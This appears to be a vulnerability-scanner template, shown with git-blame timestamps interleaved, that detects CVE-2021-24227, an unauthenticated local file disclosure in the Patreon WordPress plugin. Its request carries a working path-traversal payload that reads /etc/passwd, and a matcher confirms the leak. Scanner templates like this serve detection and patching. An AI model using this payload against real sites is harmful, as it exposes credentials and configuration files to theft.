2022-10-05 07:53:13 +00:00
|
|
|
id: CVE-2021-24227
|
|
|
|
|
|
|
|
|
|
info:
|
|
|
|
|
name: Patreon WordPress < 1.7.0 - Unauthenticated Local File Disclosure
|
|
|
|
|
author: theamanrawat
|
|
|
|
|
severity: high
|
2022-10-05 19:50:54 +00:00
|
|
|
description: The Jetpack Scan team identified a Local File Disclosure vulnerability
|
|
|
|
|
in the Patreon WordPress plugin before 1.7.0 that could be abused by anyone visiting
|
|
|
|
|
the site. Using this attack vector, an attacker could leak important internal
|
|
|
|
|
files like wp-config.php, which contains database credentials and cryptographic
|
|
|
|
|
keys used in the generation of nonces and cookies.
|
2022-10-05 07:53:13 +00:00
|
|
|
reference:
|
|
|
|
|
- https://wpscan.com/vulnerability/f62df02d-7678-440f-84a1-ddbf09364016
|
|
|
|
|
- https://wordpress.org/plugins/patreon-connect/
|
2022-10-05 19:50:54 +00:00
|
|
|
- https://jetpack.com/2021/03/26/vulnerabilities-found-in-patreon-wordpress-plugin/
|
2022-10-05 07:53:13 +00:00
|
|
|
classification:
|
2022-10-05 19:50:54 +00:00
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
|
cvss-score: 7.5
|
2022-10-05 07:53:13 +00:00
|
|
|
cve-id: CVE-2021-24227
|
2022-10-05 19:50:54 +00:00
|
|
|
cwe-id: CWE-200
|
2022-10-05 20:29:59 +00:00
|
|
|
tags: wordpress,patreon-connect,unauth,cve2021,lfi,patreon,wp,wpscan,cve
|
2022-10-05 07:53:13 +00:00
|
|
|
|
|
|
|
|
requests:
|
|
|
|
|
- method: GET
|
|
|
|
|
path:
|
|
|
|
|
- "{{BaseURL}}/?patron_only_image=../../../../../../../../../../etc/passwd&patreon_action=serve_patron_only_image"
|
|
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
|
matchers:
|
2022-10-05 19:50:54 +00:00
|
|
|
- type: regex
|
|
|
|
|
regex:
|
|
|
|
|
- "root:[x*]:0:0"
|
2022-10-05 07:53:13 +00:00
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
|
status:
|
2022-10-05 19:50:54 +00:00
|
|
|
- 200
|
